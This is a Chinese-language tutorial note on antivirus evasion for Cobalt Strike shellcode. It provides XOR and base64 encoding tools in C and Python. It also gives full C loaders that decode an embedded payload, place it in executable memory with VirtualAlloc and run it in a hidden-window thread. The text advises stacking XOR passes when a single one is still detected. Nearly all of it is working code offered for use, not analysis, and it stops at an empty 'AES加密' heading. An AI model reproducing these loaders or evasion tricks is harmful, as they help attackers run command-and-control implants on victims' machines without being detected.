CS免杀之07shellcoud处理

#Hacker #安全 #笔记 #木马

shellcode加密

异或加密

如果实战中, 一次简单的异或仍然被查杀, 可以尝试多次异或, 只要两次的异或使用的key不同即可

一个非常简单方便的shellcode处理示例

#include <windows.h>
#include <stdio.h>
void myXor(unsigned char str[], int len, int key) {
    for (int i = 0; i < len; i++) {
        str[i] = str[i] ^ key;
    }
}
int main() {
    // 0-255
    int key = 123;
    unsigned char buf[] = "\xfc\x48\x83"; // cs生成c格式的shellcode 字符串默认最后一位是\0
    printf("原始shellcode:\r\n");
    for (int i = 0; i < sizeof(buf); i++) {
        printf("\\x%02x", buf[i]);
    }
    myXor(buf, sizeof(buf), key);
    printf("\r\n\r\n异或后的shellcode:\r\n");
    for (int i = 0; i < sizeof(buf); i++) {
        printf("\\x%02x", buf[i]);
    }
    myXor(buf, sizeof(buf), key);
    printf("\r\n\r\n第二次异或后的shellcode:\r\n");
    for (int i = 0; i < sizeof(buf); i++) {
        printf("\\x%02x", buf[i]);
    }
}

以下是python写的 xor 工具,从文件中读取 shellcode,并使用指定的 key 进行 XOR 操作 ,key 必须是 1-255 之间的整数

import sys

def xor_shellcode(shellcode, key):
    # 将 shellcode 字节序列与 key 进行 XOR 操作
    xor_result = bytes(b ^ key for b in shellcode)
    return xor_result.hex()

def main():
    # 检查参数数量
    if len(sys.argv) != 3:
        print("用法: python xor_tool.py <file_path> <key>")
        sys.exit(1)

    # 获取命令行参数
    file_path = sys.argv[1]
    try:
        key = int(sys.argv[2])
    except ValueError:
        print("密钥必须是一个整数。")
        sys.exit(1)

    # 检查 key 范围
    if key < 1 or key > 255:
        print("密钥必须在 1 到 255 的范围内。")
        sys.exit(1)

    # 从文件中读取 shellcode
    try:
        with open(file_path, 'rb') as file:
            shellcode_bytes = file.read()
    except FileNotFoundError:
        print(f"未找到文件: {file_path}")
        sys.exit(1)
    except IOError:
        print(f"无法读取文件: {file_path}")
        sys.exit(1)

    # 调用 XOR 函数并输出结果
    result = xor_shellcode(shellcode_bytes, key)
    print(f"XOR 结果: {result}")

if __name__ == "__main__":
    main()

使用命令 python xor_tool.py <file_path> <key> 进行处理
例如:python xor_tool.py shellcode.bin 5

c实现异或加载器

#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗
口
void myXor(unsigned char str[], int len, int key) {
    for (int i = 0; i < len; i++) {
        str[i] = str[i] ^ key;
    }
}
unsigned char buf[] = "\x87\x33\xf8\x9f\x8b...";  // 此处放异或后的shellcode
int main() {
    // 异或解密
    int key = 123;
    myXor(buf, sizeof(buf), key);
    // 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块
    LPVOID addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, 
PAGE_EXECUTE_READWRITE);
    // 申请失败 , 退出
    if (addr == NULL) {
        return 1;
    }
    // 把shellcode拷贝到这块内存
    memcpy(addr, buf, sizeof(buf));
    // 创建线程运行
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, 
NULL);
    // 等待线程运行
    WaitForSingleObject(hThread, -1);
    // 关闭线程
    CloseHandle(hThread);
    return 0;
}

base64编码

下面是一个用 C 语言编写的程序,从一个包含十六进制字符串的文件中读取 shellcode,然后将其转换为 base64 编码并输出结果

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/bio.h>
#include <openssl/evp.h>

// 将十六进制字符转换为字节
unsigned char hex_to_byte(const char *hex) {
    unsigned char byte = 0;
    for (int i = 0; i < 2; i++) {
        byte <<= 4;
        if (hex[i] >= '0' && hex[i] <= '9') {
            byte |= (hex[i] - '0');
        } else if (hex[i] >= 'a' && hex[i] <= 'f') {
            byte |= (hex[i] - 'a' + 10);
        } else if (hex[i] >= 'A' && hex[i] <= 'F') {
            byte |= (hex[i] - 'A' + 10);
        }
    }
    return byte;
}

// 将十六进制字符串转换为字节数组
unsigned char *hex_to_bytes(const char *hex, size_t *out_len) {
    size_t len = strlen(hex);
    if (len % 2 != 0) {
        fprintf(stderr, "无效的十六进制字符串长度\n");
        return NULL;
    }
    *out_len = len / 2;
    unsigned char *bytes = (unsigned char *)malloc(*out_len);
    if (!bytes) {
        fprintf(stderr, "内存分配失败\n");
        return NULL;
    }
    for (size_t i = 0; i < *out_len; i++) {
        bytes[i] = hex_to_byte(&hex[i * 2]);
    }
    return bytes;
}

// Base64 编码
char *base64_encode(const unsigned char *input, size_t len, size_t *out_len) {
    BIO *bio, *b64;
    BUF_MEM *buffer_ptr;

    b64 = BIO_new(BIO_f_base64());
    bio = BIO_new(BIO_s_mem());
    bio = BIO_push(b64, bio);

    BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL); // 不要添加换行符
    BIO_write(bio, input, len);
    BIO_flush(bio);
    BIO_get_mem_ptr(bio, &buffer_ptr);

    char *b64text = (char *)malloc(buffer_ptr->length + 1);
    if (!b64text) {
        fprintf(stderr, "内存分配失败\n");
        return NULL;
    }
    memcpy(b64text, buffer_ptr->data, buffer_ptr->length);
    b64text[buffer_ptr->length] = '\0';

    *out_len = buffer_ptr->length;

    BIO_free_all(bio);

    return b64text;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "用法: %s <hex_file>\n", argv[0]);
        return EXIT_FAILURE;
    }

    FILE *file = fopen(argv[1], "r");
    if (!file) {
        perror("文件打开失败");
        return EXIT_FAILURE;
    }

    // 读取文件内容
    fseek(file, 0, SEEK_END);
    size_t file_size = ftell(file);
    fseek(file, 0, SEEK_SET);

    char *hex_str = (char *)malloc(file_size + 1);
    if (!hex_str) {
        fprintf(stderr, "内存分配失败\n");
        fclose(file);
        return EXIT_FAILURE;
    }

    fread(hex_str, 1, file_size, file);
    hex_str[file_size] = '\0';
    fclose(file);

    // 转换为字节数组
    size_t byte_len;
    unsigned char *bytes = hex_to_bytes(hex_str, &byte_len);
    free(hex_str);

    if (!bytes) {
        return EXIT_FAILURE;
    }

    // Base64 编码
    size_t b64_len;
    char *b64_encoded = base64_encode(bytes, byte_len, &b64_len);
    free(bytes);

    if (!b64_encoded) {
        return EXIT_FAILURE;
    }

    printf("Base64 编码: %s\n", b64_encoded);
    free(b64_encoded);

    return EXIT_SUCCESS;
}

下面是一个使用 Python 实现的脚本,从包含十六进制字符串的文件中读取 shellcode,然后将其转换为 Base64 编码并输出结果

import sys
import binascii
import base64

def read_hex_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            hex_data = file.read().strip()
        return hex_data
    except FileNotFoundError:
        print(f"未找到文件: {file_path}")
        sys.exit(1)
    except IOError:
        print(f"无法读取文件: {file_path}")
        sys.exit(1)

def hex_to_bytes(hex_string):
    try:
        return binascii.unhexlify(hex_string)
    except binascii.Error:
        print("无效的十六进制字符串")
        sys.exit(1)

def bytes_to_base64(byte_data):
    return base64.b64encode(byte_data).decode('utf-8')

def main():
    if len(sys.argv) != 2:
        print("用法: python hex_to_base64.py <file_path>")
        sys.exit(1)

    file_path = sys.argv[1]

    # 读取十六进制字符串文件
    hex_string = read_hex_from_file(file_path)

    # 转换为字节数组
    byte_data = hex_to_bytes(hex_string)

    # 将字节数组转换为 Base64 编码
    base64_encoded = bytes_to_base64(byte_data)

    print(f"Base64 Encoded: {base64_encoded}")

if __name__ == "__main__":
    main()

c实现base64加载器

base64,h

#ifndef base64_h
#define base64_h

#include <stdio.h>

#if __cplusplus
extern "C"{
#endif
    
    int base64_encode(const char *indata, int inlen, char *outdata, int *outlen);
    int base64_decode(const char *indata, int inlen, char *outdata, int *outlen);
            
#if __cplusplus
}
#endif

#endif /* base64_h */

base64.c

#include "base64.h"

#include <stdio.h>
#include <stdlib.h>

// base64 转换表, 共64个
static const char base64_alphabet[] = {
    'A', 'B', 'C', 'D', 'E', 'F', 'G',
    'H', 'I', 'J', 'K', 'L', 'M', 'N',
    'O', 'P', 'Q', 'R', 'S', 'T',
    'U', 'V', 'W', 'X', 'Y', 'Z',
    'a', 'b', 'c', 'd', 'e', 'f', 'g',
    'h', 'i', 'j', 'k', 'l', 'm', 'n',
    'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
    '+', '/' };

// 解码时使用
static const unsigned char base64_suffix_map[256] = {
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 253, 255,
    255, 253, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 253, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255,  62, 255, 255, 255,  63,
    52,  53,  54,  55,  56,  57,  58,  59,  60,  61, 255, 255,
    255, 254, 255, 255, 255,   0,   1,   2,   3,   4,   5,   6,
    7,   8,   9,  10,  11,  12,  13,  14,  15,  16,  17,  18,
    19,  20,  21,  22,  23,  24,  25, 255, 255, 255, 255, 255,
    255,  26,  27,  28,  29,  30,  31,  32,  33,  34,  35,  36,
    37,  38,  39,  40,  41,  42,  43,  44,  45,  46,  47,  48,
    49,  50,  51, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
    255, 255, 255, 255 };

static char cmove_bits(unsigned char src, unsigned lnum, unsigned rnum) {
    src <<= lnum; // src = src << lnum;
    src >>= rnum; // src = src >> rnum;
    return src;
}

int base64_encode(const char* indata, int inlen, char* outdata, int* outlen) {

    int ret = 0; // return value
    if (indata == NULL || inlen == 0) {
        return ret = -1;
    }

    int in_len = 0; // 源字符串长度, 如果in_len不是3的倍数, 那么需要补成3的倍数
    int pad_num = 0; // 需要补齐的字符个数, 这样只有2, 1, 0(0的话不需要拼接, )
    if (inlen % 3 != 0) {
        pad_num = 3 - inlen % 3;
    }
    in_len = inlen + pad_num; // 拼接后的长度, 实际编码需要的长度(3的倍数)

    int out_len = in_len * 8 / 6; // 编码后的长度

    char* p = outdata; // 定义指针指向传出data的首地址

    //编码, 长度为调整后的长度, 3字节一组
    for (int i = 0; i < in_len; i += 3) {
        int value = *indata >> 2; // 将indata第一个字符向右移动2bit(丢弃2bit)
        char c = base64_alphabet[value]; // 对应base64转换表的字符
        *p = c; // 将对应字符(编码后字符)赋值给outdata第一字节

        //处理最后一组(最后3字节)的数据
        if (i == inlen + pad_num - 3 && pad_num != 0) {
            if (pad_num == 1) {
                *(p + 1) = base64_alphabet[(int)(cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4))];
                *(p + 2) = base64_alphabet[(int)cmove_bits(*(indata + 1), 4, 2)];
                *(p + 3) = '=';
            }
            else if (pad_num == 2) { // 编码后的数据要补两个 '='
                *(p + 1) = base64_alphabet[(int)cmove_bits(*indata, 6, 2)];
                *(p + 2) = '=';
                *(p + 3) = '=';
            }
        }
        else { // 处理正常的3字节的数据
            *(p + 1) = base64_alphabet[cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4)];
            *(p + 2) = base64_alphabet[cmove_bits(*(indata + 1), 4, 2) + cmove_bits(*(indata + 2), 0, 6)];
            *(p + 3) = base64_alphabet[*(indata + 2) & 0x3f];
        }

        p += 4;
        indata += 3;
    }

    if (outlen != NULL) {
        *outlen = out_len;
    }

    return ret;
}


int base64_decode(const char* indata, int inlen, char* outdata, int* outlen) {

    int ret = 0;
    if (indata == NULL || inlen <= 0 || outdata == NULL || outlen == NULL) {
        return ret = -1;
    }
    if (inlen % 4 != 0) { // 需要解码的数据不是4字节倍数
        return ret = -2;
    }

    int t = 0, x = 0, y = 0, i = 0;
    unsigned char c = 0;
    int g = 3;

    while (indata[x] != 0) {
        // 需要解码的数据对应的ASCII值对应base64_suffix_map的值
        c = base64_suffix_map[indata[x++]];
        if (c == 255) return -1;// 对应的值不在转码表中
        if (c == 253) continue;// 对应的值是换行或者回车
        if (c == 254) { c = 0; g--; }// 对应的值是'='
        t = (t << 6) | c; // 将其依次放入一个int型中占3字节
        if (++y == 4) {
            outdata[i++] = (unsigned char)((t >> 16) & 0xff);
            if (g > 1) outdata[i++] = (unsigned char)((t >> 8) & 0xff);
            if (g > 2) outdata[i++] = (unsigned char)(t & 0xff);
            y = t = 0;
        }
    }
    if (outlen != NULL) {
        *outlen = i;
    }
    return ret;
}

main.c

#include <windows.h>
#include <stdio.h>
#include "base64.h"
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗
口
int chartoint(char ch)
{
    //0xff   0=9   a-f  A-F
   //'5' = 65 '0'=60 65-60=5
    if (ch >= '0' && ch <= '9')
    {
        return ch - '0';
    }
    else if (ch >= 'a' && ch <= 'f')
    {
        return ch - 'a' + 10;
    }
    else if (ch >= 'A' && ch <= 'F')
    {
        return ch - 'A' + 10;
    }
}
int stringtoint(char* string, char* ary)
{
    //0x01\0x67\0xa9\0x67\0x66\0xff
    //0x10==16  0x20==32;16+2
    //10  20 ;10
    int hex = 0;
    for (size_t i = 0; i < strlen(string); i++)
    {
        if (string[i] == 'x')
        {
            int ff = string[i + 1];
            ary[hex] = chartoint(string[i + 1]) * 16 + chartoint(string[i + 2]);
            hex += 1;
            i = i + 2;
        }
    }
    return hex;
}
int main() {
    char str2[] = "XHhmY1x4N.......";  // 此处放base64编码后的shellcode
    int len = 0;
    char str3[1000] = { 0 };
    base64_decode(str2, (int)strlen(str2), str3, &len);
    // 字符串转成字符数组,确保长度足够大
    char ary[10000] = { 0 };
    int nlen = strlen(str3) / 5 + 1;
    // 转换
    int hex = stringtoint(str3, ary); 
    // 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块
    LPVOID addr = VirtualAlloc(NULL, sizeof(ary), MEM_COMMIT | MEM_RESERVE, 
PAGE_EXECUTE_READWRITE);
    // 申请失败 , 退出
    if (addr == NULL) {
        return 1;
    }
    // 把shellcode拷贝到这块内存
    memcpy(addr, ary, sizeof(ary));
    // 创建线程运行
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, 
NULL);
    // 等待线程运行
  
  WaitForSingleObject(hThread, -1);
    // 关闭线程
    CloseHandle(hThread);
    return 0;
}

AES加密